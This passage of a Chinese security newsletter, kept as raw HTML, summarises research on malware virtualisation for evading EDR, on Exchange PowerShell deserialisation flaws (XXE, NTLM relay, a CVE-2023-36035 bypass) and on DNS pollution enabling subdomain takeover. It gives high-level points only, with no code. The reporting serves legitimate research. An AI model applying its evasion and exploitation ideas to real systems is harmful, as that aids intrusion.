		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKufjkIfV93TVllKwJ5ib3BwXhmf9tPczAx3khsntJzrxehKbDfd8Tz0ew/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKufjkIfV93TVllKwJ5ib3BwXhmf9tPczAx3khsntJzrxehKbDfd8Tz0ew/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=5121525581225184"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">随着EDR系统的不断提升，攻击者需要不断改进他们的方法来逃避检测。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">传统的杀毒Signature检测已不再有效，打包器和多态引擎出现了，但它们也面临着被检测的问题。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">恶意软件的虚拟化能够有效地隐藏攻击者的真实intent和code flow，通过这种方式来逃避EDR的检测。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">使用自定义虚拟机和Bytecode可以实现恶意软件的高度定制和逃避检测的能力。</section></li></ul>
	<br/>
	<p>🏷️: 恶意软件, EDR, 虚拟化, 逃避策略, 网络安全</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x04
			 利用ProxyNotShell后的Exchange PowerShell：无参数构造函数</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">本文详细介绍了 PowerShell Remoting 中的 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">ConvertViaNoArgumentConstructor</code> 转换机制，并展示了如何利用这一机制发现三个新的 Exchange 漏洞，分别是 XXE 文件读取、NTLM 中继以及对 CVE-2023-36035 的部分绕过。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.24892703862660945" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="466" src="https://wechat2rss.xlab.app/img-proxy/?k=22ae8c1b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuGVibXv2yPrfYQHYhNsRgMBGwtbZsibqISme7ebyu4NVX35LC968ibZRIQ%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.5666666666666667" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=59b19d78&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuvJRUQeHDVMlnSglXjvLBwBAQz370zcLWic1jhFrMo8FmfJPOuEHGqPw%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.8086642599277978" data-w="554" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=8d5f024c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuGmcYJZ7YFWtpsGeg1RHxjaFAvbmJLRkqWTN9lKZcXVkmhE4JJKNtiaA%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuw3qKuqpn8seZ9CDjBLBSCtwPbIjFuaoyXBH5XgEnnqe6lKNliciae1gg/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuw3qKuqpn8seZ9CDjBLBSCtwPbIjFuaoyXBH5XgEnnqe6lKNliciae1gg/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4848545518488188"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;"><code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">ConvertViaNoArgumentConstructor</code> 的强大能力：这一转换机制允许攻击者通过允许的类型的成员进行反序列化，即使这些成员的类型不在允许列表上。这显著扩大了攻击面。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">成员反序列化的风险：即使成员没有公共 setter，或者有 setter 但不是公共的，反序列化过程仍然会发生。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">微软对 NTLM 中继的态度：微软认真对待 Exchange 中的 NTLM 中继漏洞，因为它可能导致权限提升。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">安全加固的挑战：即使在对 PowerShell Remoting 进行加固后，仍然存在利用允许的类型成员进行攻击的漏洞。</section></li></ul>
	<br/>
	<p>🏷️: Exchange, PowerShell, 漏洞利用, 网络安全, ProxyNotShell</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x05
			 中国防火墙引发的漏洞问题</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">Assetnote 发现并研究了一种由中国防火长城引起的 DNS 污染问题，该问题可能影响数百万个域名，并可能导致子域名接管和其他安全风险。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.7620370370370371" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=6f4bf819&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmyq5bxfrpKjOKMIfnBkjKurBbYamImQ2nsL70BQ3Fu9BqHSGVNxLhCLic4VKRfibMPIqUMyLcFM4QQ%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.6157407407407407" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=a201b222&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmyq5bxfrpKjOKMIfnBkjKu4bkmxbKlcoiaYVILL49jE5H9m7HgSZRzDiafYoFjficjiaQkK3ukcq0HIQ%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">中国域名DNS污染影响3000万+域名，PrettyRecon可查询受影响域名</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">DNS 污染影响数千万域名：研究揭示中国域名服务器风险</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuEax9vMAJ7uDBprMLib45URy9gtOXiaDGKsug4bxDO4DdGiajMyib1SVdOg/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmyq5bxfrpKjOKMIfnBkjKuEax9vMAJ7uDBprMLib45URy9gtOXiaDGKsug4bxDO4DdGiajMyib1SVdOg/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4848545248884518"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
